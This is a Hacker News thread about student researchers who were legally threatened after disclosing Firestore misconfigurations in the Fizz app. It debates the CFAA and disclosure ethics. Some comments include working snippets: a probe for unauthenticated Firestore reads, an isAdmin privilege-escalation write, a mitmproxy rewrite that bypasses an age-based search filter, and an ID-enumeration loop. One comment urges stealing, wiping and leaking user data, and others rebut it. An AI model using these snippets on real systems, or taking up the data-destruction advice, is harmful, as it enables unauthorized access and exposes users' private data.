       | 
        | Sure, you still get some of that today from an especially
        | old-fashioned company, or in this case naive college
        | students, but overall things have shifted quite dramatically
        | in favor of disclosure: dedicated middlemen who protect
        | security researchers' identities, large enterprises
        | encouraging and celebrating disclosure, six-figure bug
        | bounties; even the laws
       | themselves have changed to be more friendly to security
       | researchers.
       | 
       | I'm sure it was quite unpleasant to go through this for the
       | author, but it's a nice reminder that situations like this are
        | now somewhat rare, whereas they used to be the norm (or worse).
        
         | _greim_ wrote:
         | I wonder if this was the students' attempt to protect their
         | future careers as much as anything--"keep quiet about this or
         | else"--especially given the issues were quickly fixed. In that
         | sense it differs from the classic 90s era retaliation. From the
         | students' POV it was probably quite terrifying. I wouldn't
         | discount intervention by wealthy parents either, but of course
         | I know nothing of the situation or the people involved.
        
         | formerly_proven wrote:
         | > Suggestions of anonymous email accounts and that sort of
         | thing.
         | 
         | This is still the way to go even in many western countries.
        
         | lamontcg wrote:
         | The problem is that it is still entirely illegal to do this
         | kind of hacking without any permission.
         | 
         | The fact that a lot of companies have embraced bug bounties and
         | encourage this kind of stuff against them unfortunately teaches
         | "kids" that this kind of thing is perfectly
         | legal/moral/ethical/etc.
         | 
         | As this story shows though you're really rolling the dice, even
         | though it worked out in this case.
         | 
         | > Discussions in forums / BBS's would be around if it was safe
         | to disclose at all. Suggestions of anonymous email accounts and
         | that sort of thing.
         | 
         | This is probably still a better idea if you don't have the
         | cooperation of the target of the hack via some stated bug
         | bounty program. But that doesn't help the security researcher
         | "make a name" for themselves.
         | 
         | And you're basically admitting to the fact that you trespassed,
         | even if all you did was the equivalent of walking through an
         | unlocked door and verifying that you could look inside their
         | refrigerator.
         | 
         | The fact that it may play out in the court of public opinion
         | that you were helping to expose the lies of a corporation
          | doesn't change the fact that in the actual courts you are
         | guilty of a crime.
        
           | Buttons840 wrote:
           | Yeah, when it comes to cyber-security, we put our national
           | security at risk so companies can avoid being embarrassed.
           | (See my rant in another comment.)
        
             | asynchronous wrote:
             | As much as I hate using regulation as a hammer to fix
              | things, if we did make software companies legally
              | required to meet a level of security, then failures
              | uncovered by vulnerability testing like this could be
              | prosecuted similarly to SEC or OSHA violations, and it
              | would work quite nicely.
        
               | Buttons840 wrote:
               | Protecting white-hat hackers could be seen as a reduction
               | in "regulation", since it permits the good guys to do
               | good things. It allows people to _do_ more, but some
                | people will no longer be legally shielded from
                | embarrassment and accountability.
               | 
               | In the current status quo, everyone except the good guys
                | gets free rein: companies can stop legal scrutiny of
               | their security, black-hats run wild and answer to no one,
               | and the white-hats wring their hands "please sir, may I
               | check for myself that the services I depend on are
               | secure?" to which the companies respond "ha ha, no, but
               | trust us, it's secure."
        
       | JakeAl wrote:
        | In short, if a company is not 100% secure but says it is, then
        | it is committing fraud. The person doing the testing is providing
        | the evidence for a legal case, and no amount of legal threats
        | changes that.
        
       | jccalhoun wrote:
       | This sounds a lot less interesting than the title makes it out to
       | be. Is the fact that it is a "classmate" really relevant? Would
       | the events have happened differently if it was another company
       | with no connection to the school?
        
       | lxe wrote:
       | There should be harsher penalties for lawyers like Hopkins &
       | Carley for threatening security researchers and engaging in
       | unprofessional conduct like this.
        
       | winter_blue wrote:
        | This isn't the first time a security researcher who's politely
        | and confidentially disclosed a vulnerability has been threatened.
       | There's an important lesson to glean from this.
       | 
       | The next time someone discovers a company that has poor database
       | security, they should, IMO: (1) make a full copy of confidential
       | user data, (2) delete all data on the server, (3) publish
       | confidential user data on some dumping site; and protect their
       | anonymity while doing all 3 of these.
       | 
       | If these researchers had done (2) and (3) - and done so
       | _anonymously_, that would have _not only_ protected them from
       | legal threats/harm, but also effectively killed off a company
       | that shouldn't exist - since all of Buzz/Fizz's users would
       | likely abandon it as a consequence.
        
         | AnimalMuppet wrote:
         | So your solution for possibly being prosecuted for something
         | marginal is to do several things for which it would be much
         | more reasonable to be prosecuted? That seems like a rather
         | unwise solution to the problem.
         | 
         | It's especially unwise because you now give the company a
         | massive incentive to hire real forensics specialists to try to
         | track you down. You're placing a lot of faith in your ability
         | to remain anonymous under that level of scrutiny.
        
         | jstarfish wrote:
         | > The next time someone discovers a company that has poor
         | database security, they should, IMO: (1) make a full copy of
         | confidential user data, (2) delete all data on the server, (3)
         | publish confidential user data on some dumping site; and [4]
         | protect their anonymity while doing all 3 of these.
         | 
         | Aaron Swartz only did (1). Failing at (4) didn't end so well
         | for him.
         | 
         | I get that you're frustrated but encouraging others to make
         | martyrs of themselves is cowardice. If some dumb kid tries this
         | and their opsec isn't bulletproof, they're fucked. Put your own
         | skin in the game and do it yourself if your convictions are
         | that strong.
        
         | pc86 wrote:
         | "To avoid a baseless legal threat you should commit multiple
         | felonies" is certainly an interesting take.
        
           | meepmorp wrote:
           | Well, at that point, the legal threats stop being baseless.
           | Problem solved!
        
         | dragonwriter wrote:
         | > If these researchers had done (2) and (3) - and done so
         | anonymously, that would have not only protected them from legal
         | threats/harm
         | 
         | No, it wouldn't. Anonymity can be penetrated, and the more
         | incentive people have to do so, the more likely it will be.
        
       | [deleted]
        
       | icameron wrote:
       | The Stanford Daily article says "At the time, Fizz used Google's
       | Firestore database product to store data including user
       | information and posts...Fizz did not have the necessary security
       | rules set up, making it possible for anyone to query the database
       | directly...phone numbers and/or email addresses for all users
       | were fully accessible, and that posts and upvotes were directly
       | linkable to this identifiable information....Moreover, the
       | database was entirely editable -- it was possible for anyone to
       | edit posts, karma values, moderator status, and so on."
       | 
       | That's wild!
        
         | gregsadetsky wrote:
         | Speaking of, are there tools to audit/explore
         | firebase/firestore databases i.e. see if collections/documents
         | are readable?
         | 
         | I imagine a web tool that could take the app id and other api
         | values (that are publicly embedded in frontend apps),
         | optionally support a session id (for those firestore apps that
         | use a lightweight "only visible to logged in users" security
         | rule) and accept names of collections (found in the js code) to
         | explore?
        
           | saligrama wrote:
           | Baserunner [1] does exactly this. I described using it for
           | Firebase security research in my blog post [2].
           | 
           | [1] https://github.com/iosiro/baserunner
           | 
           | [2] https://saligrama.io/blog/post/firebase-insecure-by-default/
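           | 
           | For a rough idea of what such a tool checks under the hood,
           | here's a minimal sketch (in Python; the project ID and
           | collection name are hypothetical placeholders) that probes
           | Firestore's public REST API for a world-readable collection:
           | 
           |     # probe_firestore.py -- unauthenticated read probe
           |     import requests
           | 
           |     PROJECT = "some-app-id"  # from the app's embedded config
           |     COLLECTION = "users"     # guessed from the client JS
           | 
           |     url = ("https://firestore.googleapis.com/v1/projects/"
           |            f"{PROJECT}/databases/(default)/documents/{COLLECTION}")
           |     resp = requests.get(url)  # note: no credentials attached
           |     if resp.ok:
           |         docs = resp.json().get("documents", [])
           |         print(f"world-readable: {len(docs)} documents returned")
           |     else:
           |         print(f"denied: HTTP {resp.status_code}")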
        
         | morpheuskafka wrote:
         | A few years ago I found that HelloTalk (a language-learning
         | pen-pal app) stored the actual GPS coordinates of users in a
         | SQLite database that you can find in your iOS backup. The in-
         | app map showed only a general location (the pin disappeared
         | past a certain zoom level).
         | 
         | You could also bypass the filter that prevents under-18 users
         | from searching for over-18 users (and vice versa), as well as
         | paid-only filters like location, gender, etc., by rewriting
         | the requests with mitmproxy (paid status was not checked
         | server-side).
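         | 
         | A minimal sketch of that request-rewriting idea as a mitmproxy
         | addon (the endpoint path and parameter name here are
         | hypothetical; the point is that a filter enforced only client-
         | side can be changed in transit):
         | 
         |     # rewrite_filter.py -- run with: mitmdump -s rewrite_filter.py
         |     from mitmproxy import http
         | 
         |     def request(flow: http.HTTPFlow) -> None:
         |         # Overwrite a client-enforced search filter before the
         |         # request reaches the server.
         |         if "/search" in flow.request.path and flow.request.urlencoded_form:
         |             flow.request.urlencoded_form["age_filter"] = "any"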
        
         | iancarroll wrote:
         | This is unfortunately a very common issue with Firebase apps.
         | Since the client is writing directly to the database, usually
         | authorization is forgotten and the client is trusted to only
         | write to their own objects.
         | 
         | A long time ago I was able to get admin access to an electric
         | scooter company by updating my Firebase user to have isAdmin
         | set to true, and then I accidentally deleted the scooter I was
         | renting from Firebase. I am not sure what happened to it after
         | that.
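         | 
         | For the curious, that kind of write test looks roughly like
         | this against Firestore's REST API (the project ID, document
         | path, and field name are hypothetical; only try this against
         | systems you are authorized to test):
         | 
         |     # flip_flag.py -- attempt a client-side write to your own doc
         |     import requests
         | 
         |     url = ("https://firestore.googleapis.com/v1/projects/some-app-id/"
         |            "databases/(default)/documents/users/my-own-uid"
         |            "?updateMask.fieldPaths=isAdmin")
         |     body = {"fields": {"isAdmin": {"booleanValue": True}}}
         |     resp = requests.patch(url, json=body)
         |     # HTTP 200 means the rules let any client set isAdmin.
         |     print(resp.status_code)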
        
           | yismail wrote:
           | If I recall correctly, you can set your firebase rules such
           | that a user can only read/write/delete certain collections
           | based on conditions such as if user.email ==
           | collection.email.
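           | 
           | Something like this in the Firestore security-rules language
           | (the collection name is hypothetical) is a minimal sketch of
           | that idea, and would have blocked the reads and writes
           | described in this thread:
           | 
           |     rules_version = '2';
           |     service cloud.firestore {
           |       match /databases/{db}/documents {
           |         // Each user may read/write only their own document.
           |         match /users/{uid} {
           |           allow read, write: if request.auth != null
           |                              && request.auth.uid == uid;
           |         }
           |       }
           |     }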
        
             | justrealist wrote:
             | Doing authorization within firestore breaks down instantly
             | outside of toy applications.
        
           | jacquesm wrote:
           | I think deleting a scooter is against some law of
           | conservation :)
        
           | singleshot_ wrote:
           | One interesting thing about the statute of limitations is
           | "the discovery rule."
           | 
           | For example, say the statute of limitations for 18 USC 1030
           | is two years. If a person hypothetically stole a scooter by
           | hacking, two years later, they would be in the clear, right?
           | 
           | No. The discovery rule says that if a damaged party, for good
           | reason, does not immediately discover their loss, the
           | statute of limitations is paused until they do.
           | 
           | Accordingly, if the scooter company read a post today about a
           | hack that happened "a long time ago" and therein discovered
           | their loss, the statute of limitations would begin to tick
           | today and the hacker could be in legal jeopardy for two more
           | years.
        
             | henriquez wrote:
             | Does this apply to criminal or just civil?
        
               | btilly wrote:
               | Generally it applies to both. But some crimes (eg murder)
               | might not have a statute of limitations.
               | 
               | https://www.law.cornell.edu/wex/statute_of_limitations
               | 
               | Also there are subtle questions around what discovery
               | means here. Usually it is some sort of "could be
               | discovered with reasonable effort". If I had proof of
               | your wrongdoing in a letter sent to me, I am unlikely to
               | get away with saying, "Oh, I didn't read the letter when
               | I got it." If that proof was buried in a computer file
               | with a million pages, I probably can reasonably say,
               | "That was a needle in a haystack, and I didn't even know
               | what to look for." For situations between those extremes,
               | there will be case law that likely varies by state.
               | 
               | This is where a lawyer gets to earn their pay.
        
               | singleshot_ wrote:
               | Huge arrow pointing to "varies by state" on all of this.
               | 
               | 1030 (which is, of course, federal law) actually has a
               | specific discovery/statute of limitations in the text of
               | the statute, and so may not be affected by state
               | discovery rule law.
        
             | iancarroll wrote:
             | The scooter company was well aware of it as I told them
             | about that + several other issues immediately. :)
        
               | singleshot_ wrote:
               | Well that makes me smile. I should have figured there was
               | more to that story!
        
           | dudus wrote:
           | It is common. But before you curse at Google here: this is
           | VERY well documented. When you create a database, the UI
           | screams at you that it's in dev mode, that security has not
           | been set up, etc. If you keep ignoring the warnings, the
           | database will eventually close itself down automatically.
           | 
           | So this is entirely the dev team's fault.
        
           | manicennui wrote:
           | Which is why I hate that people keep claiming that you don't
           | need to know what you are doing, nor employ anyone who does,
           | to set up infrastructure. You might be able to stand things
           | up without knowing what you are doing, but you probably
           | shouldn't be running them in production that way.
        
       | utopcell wrote:
       | Given the aggressive response from this company, it is less
       | likely to become the target of any security researchers in the
       | future (who wants the hassle?). That by itself makes their app
       | less secure in the long term. Also, who'd want to support
       | founders with this "I will destroy you, even though you helped
       | me improve my system!" mentality? I wouldn't be surprised if
       | this startup dies off because of this.
       | 
       | Kudos to Cooper, Miles and Aditya for seeing this through.
        
       | wedn3sday wrote:
       | Maybe it's just my Oppositional Defiant Disorder talking, but I
       | would have nuked their db after that bs threat.
        
         | rootusrootus wrote:
         | > Maybe it's just my Oppositional Defiant Disorder talking
         | 
         | Is that the clinical term for Internet Tough Guy?
         | 
         | I imagine deleting the DB would almost certainly lead to actual
         | CFAA consequences. Which kinda suck, as I recall.
        
           | xigency wrote:
           | Yeah, it's unwise, but also a fair warning. If you threaten
           | someone who has leverage over you, you might find your own
           | problems escalated. Not everyone behaves perfectly rationally
           | under pressure.
        
       | tptacek wrote:
       | I'm not a lawyer, but I am professionally interested in this
       | weird branch of the law, and it seems like EFF's staff attorney
       | went a bit out on a limb here:
       | 
       | * Fizz appears to be a client/server application (presumably a
       | web app?)
       | 
       | * The testing the researchers did was of software running on
       | Fizz's servers
       | 
       | * After identifying a vulnerability, the researchers created
       | administrator accounts using the database activity they obtained
       | 
       | * The researchers were not given permission to do this testing
       | 
       | If that fact pattern holds, then unless there's a California law
       | governing this that I'm not aware of --- and even then, federal
       | supremacy moots it, right? --- I think they did straightforwardly
       | violate the CFAA, contra the claim in their response.
       | 
       | At least three things mitigate their legal risk:
       | 
       | 1. It's very clear from their disclosure and behavior after
       | disclosing that they were in good faith conducting security
       | research, making them an unattractive target for prosecution.
       | 
       | 2. It's not clear that they did any meaningful damage (this is
       | subtle: you can easily rack up 5-6 figure damage numbers from
       | unauthorized security research, but Fizz was so small and new
       | that I'm assuming nobody even contemplated retaining a forensics
       | firm or truing things up with their insurers, who probably did
       | not exist), meaning there wouldn't have been much to prosecute.
       | 
       | 3. Fizz's lawyers fucked up and threatened a criminal prosecution
       | in order to obtain a valuable concession from the researchers,
       | which, as EFF points out, violates a state bar rule.
       | 
       | I think the good guys prevailed here, but I'm wary of taking too
       | many lessons from this; if this hadn't been "Fizz", but rather
       | the social media features of Dunder Mifflin Infinity, the outcome
       | might have been gnarlier.
        
         | shkkmo wrote:
         | I don't think you have the pattern of facts correct (unless you
         | have access to more information than what is in the linked
         | Stanford Daily article).
         | 
         | > At the time, Fizz used Google's Firestore database product to
         | store data including user information and posts. Firestore can
         | be configured to use a set of security rules in order to
         | prevent users from accessing data they should not have access
         | to. However, Fizz did not have the necessary security rules set
         | up, making it possible for anyone to query the database
         | directly and access a significant amount of sensitive user
         | data.
         | 
         | > We found that phone numbers and/or email addresses for all
         | users were fully accessible, and that posts and upvotes were
         | directly linkable to this identifiable information. It was
         | possible to identify the author of any post on the platform.
         | 
         | So AFAICT there is no indication they created any admin
         | accounts to access the data. This is yet another example of an
         | essentially publicly accessible database that holds what was
         | supposed to be private information. This seems like a far less
         | clear application of the CFAA than the pattern of facts you
         | describe.
        
           | adolph wrote:
           | https://news.ycombinator.com/item?id=37297823#37298972
           | 
           |  _Really what happened is we checked whether we could set
           | `isAdmin` to `true` on our existing accounts, and... we were
           | able to. Adi's more technical writeup has details:
           | https://saligrama.io/blog/post/firebase-insecure-by-default/_
        
         | mewse-hn wrote:
         | > If that fact pattern holds, then unless there's a California
         | law governing this that I'm not aware of --- and even then,
         | federal supremacy moots it, right? --- I think they did
         | straightforwardly violate the CFAA, contra the claim in their
         | response.
         | 
         | I am extremely not a lawyer but the pattern of legal posturing
         | I've observed is that some lawyer makes grand over-reaching
         | statements, the opposing lawyer responds with their own grand
         | over-reaching statements.
         | 
         | "My clients did not violate the CFAA" should logically be
         | interpreted as "good fucking luck arguing that my good faith
         | student security researcher clients violated the CFAA in
         | court".
        
         | whimsicalism wrote:
         | All that matters is whether it's a prosecutable charge
        
         | hnav wrote:
         | I think intent matters for actually securing an indictment and
         | conviction; if, for example, they can prove that you
         | exfiltrated their user data (this happened to Weev, who
         | noticed an ordinal ID in a URL and enumerated all possible
         | URLs), they could actually get the feds to bust you. But
         | you're right: if they're big enough they could try to come
         | after you regardless, at the risk of turning the security
         | research community against them.
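         | 
         | (For context, the "enumeration" in that case was trivial. The
         | pattern, sketched here with a hypothetical URL, is just:
         | 
         |     import requests
         | 
         |     for i in range(100000):
         |         # Hypothetical endpoint keyed by a guessable ordinal ID.
         |         r = requests.get(f"https://example.com/account?id={i}")
         |         if r.ok:
         |             print(i, r.text[:80])
         | 
         | No authentication was ever bypassed, which is what made the
         | prosecution so controversial.)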
        
         | tptacek wrote:
         | A friend points out that the limb EFF was out on was sturdy
         | indeed, since DOJ has issued a policy statement saying they're
         | not going after good-faith security research.
         | 
         | https://www.justice.gov/opa/pr/department-justice-announces-...
        
           | doctorpangloss wrote:
           | So then you'd concede that all that's left is these Fizzbuzz
           | people are liars and are bad people, and that their product
           | is crap and should not be used, and you don't need to have
           | personally used the app nor met them personally to know any
           | of that, since it's all clear from their extremely obnoxious,
           | self destructive conduct, and that that's just an opinion and
           | not a forecast on whether or not their useless investors will
           | get a return?
        
             | tptacek wrote:
             | Perhaps you missed this line from my original comment:
             | 
             |  _I think the good guys prevailed here._
        
               | doctorpangloss wrote:
               | Yeah definitely. It's just to say that the security
               | researchers, these classmates, didn't get lucky. Like if
               | I were a Stanford student, and I heard about this shitty
               | website, you know, if I were generalizing, I wouldn't be
               | wrong to guess it was run by obnoxious people and that
               | the technology was a big lie.
               | 
                | And this website, this forum, it has a maligned love
                | affair with anti-establishment characters, and it can't
                | really figure this one out because it's dropouts v.
               | hackers on the face of it. Most of the comments are
               | litigating the law, by non lawyers and even when by
               | lawyers, by people who absolutely could not predict the
               | future of a legal decision. Why not just trust your gut?
               | What I want to hear - what I want to be the #1 comment
               | forever and for all time, which is just my opinion - is
               | like, this research never needed to happen to know that
               | Fizz or whatever is absolute trash. Do you see what I am
               | saying?
               | 
               | There are a lot of 18-22 year olds pursuing
               | entrepreneurship out of college aged vengeances. Y
               | Combinator funds many such founders! And here we see the
               | double edged sword: if you're at Stanford touting
               | yourself an entrepreneurial genius with your app about
               | antagonizing your classmates, you had better actually
               | bring the bacon to your supposed technology. Because you
               | have more than your founding team's worth of classmates
               | who hate your guts, but can actually program.
        
           | asynchronous wrote:
            | I remember when the DOJ announced that. Saying "we won't
            | prosecute, trust us" still isn't good enough to protect
            | security researchers.
        
           | Ajedi32 wrote:
           | To me that reads less as "this is legal" and more as "this is
           | illegal, but we (the executive branch of the government) will
           | be nice and not go after you for it as long as we think
           | you're a good guy". That's (arguably) better than nothing,
           | but not exactly an ideal way to structure our justice system
           | in my opinion.
        
             | whimsicalism wrote:
             | You aren't a lawyer, right?
        
               | ZoomerCretin wrote:
               | Laws are written by legislators, not the Department of
               | Justice. An administrative decision by the executive
               | branch does not change that fact. Accessing a computer
               | system without explicit authorization or "hacking" is a
               | federal crime. If you "hack", you can be charged with a
               | felony for doing so at the discretion of federal
               | prosecutors. The law isn't some magical too-
               | incomprehensible-for-mortals text requiring magicians and
               | soothsayers to interpret _literally_ every single clause
               | and statement for you. As an adult citizen of a country
               | (with an IQ above room temperature), you should be able
               | to correctly interpret statements like the above, as was
               | done by the person to whom you replied.
        
             | deepsun wrote:
             | Yes, but I don't see a better solution. If we make
             | "security research" legal, then any hacker can just say "oh
             | I was just going to disclose my findings to them".
        
               | philistine wrote:
               | Here's a better solution: change the laws!
               | 
               | Knowing the audience of this forum, you're probably
               | American and under 35. You have lived your whole life
                | with an inoperative legislature. The US Congress,
                | through a mixture of time-honored traditions with
                | unfathomable externalities (there can never be more
                | than this number of representatives) and disinterested
                | sports-like politics, is unable to print new laws in a
                | reactive
               | fashion. This means that kludges, with their own
               | unfathomable externalities, look like sane solutions.
               | They're not. A functioning democracy would set up a legal
               | framework for ethical research.
        
               | tptacek wrote:
               | You get that the legal situation for this stuff is even
               | gnarlier in Europe, right?
        
               | giantg2 wrote:
               | Not really, many professional researchers notify law
               | enforcement when engaging in something that could be
               | viewed as illegal or generate calls to the police.
               | 
               | What should happen is the addition of a "reasonable"
               | standard and using existing case law policy positions to
               | not prosecute people who have a reasonable basis
               | supporting their claim of security research.
               | 
               | Instead we'll be left with the lazy lawmakers doing
               | nothing and the executive saying they'll prosecute only
               | the people who "deserve" it.
        
               | seanw444 wrote:
               | I hate the use of "reasonable" in law. Who's to define
               | what's reasonable?
        
               | deepsun wrote:
                | It's similar with flight rules: one cannot fly a
                | paraglider over a "congested area". But what counts as
                | a "congested area" is intentionally not defined in the
                | rules, and is left to judges to decide case by case.
                | 
                | Because if the FAA tried to come up with a definition,
                | there would always be weird, unjust corner cases; or it
                | would just ban paragliders altogether. I think the
                | current ambiguity is the best compromise.
        
               | buttercraft wrote:
               | Judges and juries
        
               | dannyphantom wrote:
               | That's fair.
               | 
                | The term "reasonable" is generally used to qualify some
                | standard of behavior or conduct that is expected from
                | individuals in specific situations. Because "reasonable"
                | is inherently subjective, the responsibility for making
                | the determination is (generally) passed over to a jury,
                | who will weigh what the prosecution and defense have
                | presented, which entails previous cases, the specific
                | fact pattern of the case being deliberated, etc.
               | 
               | There are also situations where an actual judge makes the
               | determination but generally, in a criminal context, it's
               | up to a jury.
        
               | [deleted]
        
         | gsdofthewoods wrote:
         | Good analysis. One important caveat is that, while this may
         | technically have been a CFAA violation, it's almost certainly
         | not one the Department of Justice would prosecute.
         | 
         | Last year, the department updated its CFAA charging policy to
         | not pursue charges against people engaged in "good-faith
         | security research." [1] The CFAA is famously over-broad, so a
         | DOJ policy is nowhere near as good as amending the law to make
         | the legality of security research even clearer. Also, this
         | policy could change under a new administration, so it's still
         | risky--just less risky than it was before they formalized this
         | policy.
         | 
         | [1] https://www.justice.gov/opa/pr/department-justice-announces-...
        
         | theptip wrote:
         | Good analysis. I'm really confused why in the 2020s anybody
         | thinks that unsolicited pentesting is a sane or welcome thing
         | to do.
         | 
         | The OP doesn't seem to include a "mea culpa", so I hope they
         | learned this lesson, even if the piece is more meme-worthy
         | with a "can you believe what these guys tried to do?" tone.
         | 
         | While their intent seems good, they were pretty clearly
         | breaking the law.
        
           | trailbits wrote:
           | What about due diligence? If you're about to send and store
           | sensitive information with a service, a service that claims
            | to be 100% secure... shouldn't you have the right to verify
           | that the security is up to snuff? These researchers weren't
           | attempting to harm anybody. What's wrong with kicking the
           | tires?
        
           | Jka9rhnDJos wrote:
           | > I'm really confused why in the 2020s anybody thinks that
           | unsolicited pentesting is a sane or welcome thing to do.
           | 
           | Because bug bounties?
        
             | theptip wrote:
             | Bug bounties are not "unsolicited".
        
           | paganel wrote:
           | > I'm really confused why in the 2020s anybody thinks that
           | unsolicited pentesting is a sane or welcome thing to do.
           | 
           | I was looking for a comment like this. You couldn't pay me
           | enough to do this sort of thing in this day and age (unless
           | working for a DoD or 3-letter agency contractor, which would
           | have my back covered), nevermind to do it _pro bono_ or _bona
           | fide_ or whatever it is that these guys had in mind (either
           | way, it looks like they were not paid to do it).
           | 
           | This sort of action might still have been sort of ok-ish in
           | the late '00s, maybe going into 2010, 2011, but when the
           | Russian/Chinese/North Korean/Iranian cyber threats became
           | real (plus the whole Snowden fiasco) then related laws began
           | to change (both in the US and in Europe) and doing this sort
           | of stuff with no-one to back you up for real (forget the EFF)
           | meant that the one doing it would be asking for trouble in a
           | big way.
        
           | px43 wrote:
           | A security researcher checking on Firestore permissions is
           | basically the equivalent of an electrician walking into a
           | grocery store and noticing sparking wires dangling and taped
           | awkwardly, and imminent fire hazards that could result in
           | catastrophic damages to people shopping at the store.
           | 
           | It is absolutely the right, and IMO, the duty, of security
           | researchers to test every website, app, product and service
           | that they use regularly to ensure the continued safety of the
           | general public. This is too important of a field to have a
           | "not my problem" attitude of just ignoring egregious security
           | vulnerabilities so they can be exploited by criminals.
        
           | negidius wrote:
           | As a user, I definitely welcome it. It's necessary precisely
           | because companies like this lie about their security
           | practices and endanger their users.
           | 
           | The question isn't whether it should be done, but whether it
           | should be done anonymously or openly.
        
           | talideon wrote:
           | You may want to read this, as it explains why no mea culpa
            | was necessary:
            | https://www.justice.gov/opa/pr/department-justice-announces-...
           | 
           | TL;DR: it was good faith security research, and the US DoJ
           | doesn't prosecute that.
        
           | marcod wrote:
           | While what you say is true, I feel strongly that it shouldn't
           | be. It is morally right to show that a product used by many
           | fellow students and marketed as "100% secure"* is in fact
           | very vulnerable.
           | 
           | If some less ethical hackers got a hold of that data, much
           | worse things could have happened.
           | 
           | * That's the biggest red flag. A company claiming "100%"
           | obviously has very little actual security expertise.
           | 
           | PS: I'm a big fan of Germany's https://www.ccc.de/en/ who
           | have pulled many such hacks against some of the biggest tech
           | companies.
        
             | dahwolf wrote:
             | Devil's advocate:
             | 
             | I get into your home by bypassing (poor) security. I take
             | pictures and make copies of anything inside. Then I
             | publicly announce the breach and demand that you fix your
             | security based on a deadline I made up. Then I say "trust
             | me, bro" when I promise to never reveal the data I stole.
             | 
             | Nobody would find any of that moral. The analogy breaks
             | down because your home is not a place where sensitive data
              | of lots of people is stored. But even then, if you did
              | the same thing in a physical place where that was the
              | case, you'd simply be arrested, if not (accidentally)
              | shot.
             | 
             | I do agree that these security researchers are ultimately
             | doing a good thing, but they should not be this naive and
             | aggressive about it.
        
               | bawolff wrote:
               | > I get into your home by bypassing (poor) security. I
               | take pictures and make copies of anything inside. Then I
               | publicly announce the breach and demand that you fix your
               | security based on a deadline I made up. Then I say "trust
               | me, bro" when I promise to never reveal the data I stole.
               | 
               | Otoh, it sounds really different if you break into your
               | own home.
               | 
                | I think part of the issue is that with everything in the
                | cloud your data is no longer local (like it would have
                | been back in the day), but you (or the customer public)
                | still have an interest in knowing if the data is secure,
                | an interest that is at odds with the service provider,
                | who often has perverse incentives to not care about
                | security.
        
               | dahwolf wrote:
               | I agree that there's friction between the greater public
               | good and private interests.
               | 
               | But I don't agree with the reductive take that
               | compromised security means companies don't care or are
               | greedy. Companies that do care and have an army of
               | security staff still fuck up.
               | 
               | The reality check is that security is incredibly
                | complicated, expensive, and very easy to do incorrectly.
               | 
               | If anything, us software developers should do some
               | reflection on our software stack. It's honestly quite
               | shit if it requires daily updates and a team of security
               | gurus to not get it wrong.
        
               | bluepod4 wrote:
               | Yeah, I sort of get your point.
               | 
               | > So _we did what any good security researcher does_ : We
               | responsibly disclosed what we found. We wrote a detailed
               | vulnerability disclosure report. We suggested
               | remediations. And we proactively agreed not to talk about
               | our findings publicly before an _embargo date_ to give
               | them time to fix the issues. Then we sent them the report
               | via email.
               | 
               | This is why the whole "I can't believe my classmates
               | threatened legal action" line of thinking doesn't make
               | sense. They weren't acting like classmates themselves.
               | They were acting like professionals. I imagine the
               | embargo date wasn't well-received.
               | 
               | It's also interesting that they listed all of the steps
               | they followed that a "good security researcher" would do.
               | So why didn't they start with communication first before
               | trying to hack the system? Good security researchers do
               | that. (Not all of the time, obviously.)
               | 
                | > Well, me and a few security-minded friends were _drawn
               | like moths to a flame_ when we heard that. Our classmates
               | were posting quite sensitive stories on Fizz, and we
               | wanted to make sure their information was secure.
               | 
               | > So one Friday night...
               | 
               | And this is where the "good-faith security research" line
               | of reasoning broke down for me. Think about the wording.
               | To my ears/eyes, those sentences above seem like a
               | carefully crafted but still flimsy excuse. It's like a
               | lie that you tell yourself over and over so much that you
               | end up believing it. It seems like the researchers just
               | wanted to have some fun on a Friday night (like he said).
               | (And there's nothing wrong with that. But to characterize
               | it as _only_ doing "good faith security research" seems
               | like a stretch.) I guess I'm saying that I'm just not
               | convinced. I don't buy it.
               | 
                | But I get it. Articles need to be written. Talks need to
               | be given.
               | 
               | (And yes, I do believe that Fizz didn't need to threaten
               | legal action.)
        
               | bawolff wrote:
               | > So why didn't they start with communication first
               | before trying to hack the system? Good security
               | researchers do that. (Not all of the time, obviously.)
               | 
               | I don't think that is true. I think it would be very
               | unusual for an independent (not a pentester) security
               | researcher to communicate anything before they have any
               | findings.
               | 
               | > It seems like the researchers just wanted to have some
               | fun on a Friday night (like he said). (And there's
               | nothing wrong with that. But to characterize it as only
               | doing "good faith security research" seems like a
               | stretch.)
               | 
               | I don't get it. Good faith research is fun. Most people
               | don't get into the industry because they hate the work. I
               | don't even understand what you are trying to imply was in
               | their mind that would disqualify their actions from being
               | in good faith.
        
               | dahwolf wrote:
               | Agreed.
               | 
                | I think they should negotiate a security test beforehand,
                | for their own sake but also to get buy-in. And if a
               | company categorically refuses, you can then publish that,
               | or share that you worry about a lack of track record in
               | known security audits. That's a professional way to hold
               | them accountable.
               | 
                | Breaking into a system unannounced and then stating "do
                | what I say... OR ELSE" is neither legal nor professional.
                | If you're then surprised that this is perceived as an
                | attack instead of as helpful, I don't know what to say.
        
             | skshfksjdj wrote:
             | Incentives usually have unintended consequences.
             | 
             | The laws that would apply to unsolicited pentesting make it
             | undesirable to perform it.
             | 
             | Thus, society as a whole is less secure because someone
             | wants to protect companies from hacking.
        
               | marcod wrote:
               | Yes, same with the more general "whistleblowers".
               | Unethical companies will always try to punish those who
               | expose them.
        
         | kjjw wrote:
         | [flagged]
        
         | emilecantin wrote:
         | I presume that the "limb" the EFF attorney went on is basically
         | what would've been disputed in a court of law. It's easily
         | argued that if an app is so badly configured that just
         | _following the Firebase protocol_ can give you write access to
         | the database, you haven't actually circumvented any security
         | measures, because _there weren't any to circumvent_.
         | 
         | It reminds me of the case where AT&T had their iPad subscriber
         | data just sitting there on an unlisted webpage.
         | Don't remember which way it went, but I think the guy went out
         | of his way there to get all the data he could get, which isn't
         | the case here.
        
           | dgunay wrote:
           | Not a lawyer ofc, but I would not expect that line of
           | reasoning to hold up in court as I wouldn't expect "the door
           | was unlocked, your honor" to excuse trespassing.
        
             | darkarmani wrote:
             | So every URL is a trespass unless you have explicit
             | permission?
             | 
             | If you say the protocol determines authorization, then the
             | Fizz protocol granted them authorization. I don't have a
             | clear answer here because it is messy.
        
               | dahfizz wrote:
               | Its not all or nothing. The law is literally decided on a
               | case by case basis.
               | 
               | Going to the home page of a public website is clearly
               | authorized access. Creating admin users for yourself on
               | someone else's server without permission is clearly
               | unauthorized access. Any judge or jury would agree.
        
               | tptacek wrote:
               | It depends on how you uncovered the URL and what's behind
               | it: your intent, which is most of what matters here.
        
             | [deleted]
        
           | tptacek wrote:
           |  _It reminds me of the case where AT&T had their iPad
           | subscriber data just sitting there on an unlisted webpage.
           | Don't remember which way it went_
           | 
